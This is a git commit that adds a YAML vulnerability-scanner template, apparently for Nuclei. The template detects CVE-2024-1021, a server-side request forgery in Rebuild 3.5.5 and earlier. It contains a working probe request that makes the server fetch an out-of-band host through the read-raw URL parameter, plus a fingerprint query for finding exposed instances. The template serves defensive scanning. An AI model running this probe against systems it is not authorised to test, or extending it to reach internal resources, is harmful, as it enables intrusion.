Merge pull request #9225 from bmcxxx/main

Add CVE-2024-1021
2024-02-25 15:52:15 +05:30 · 2024-02-25 15:52:15 +05:30 · 2f37c61562
parent db06cda13e dc6427607f
commit 2f37c61562
1 changed files with 34 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-1021.yaml
+++ b/http/cves/2024/CVE-2024-1021.yaml
@ -0,0 +1,34 @@
+id: CVE-2024-1021
+
+info:
+  name: Rebuild <= 3.5.5 - Server-Side Request Forgery
+  author: BMCel
+  severity: medium
+  description: |
+    There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
+  remediation: |
+    Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
+  reference:
+    - https://github.com/getrebuild/rebuild
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: icon_hash="871154672"
+  tags: cve2024,cve,rebuild,ssrf
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "<h1> Interactsh Server </h1>")'
+          - '!contains(body_1, "<h1> Interactsh Server </h1>")'
+          - 'status_code_2 == 200'
+        condition: and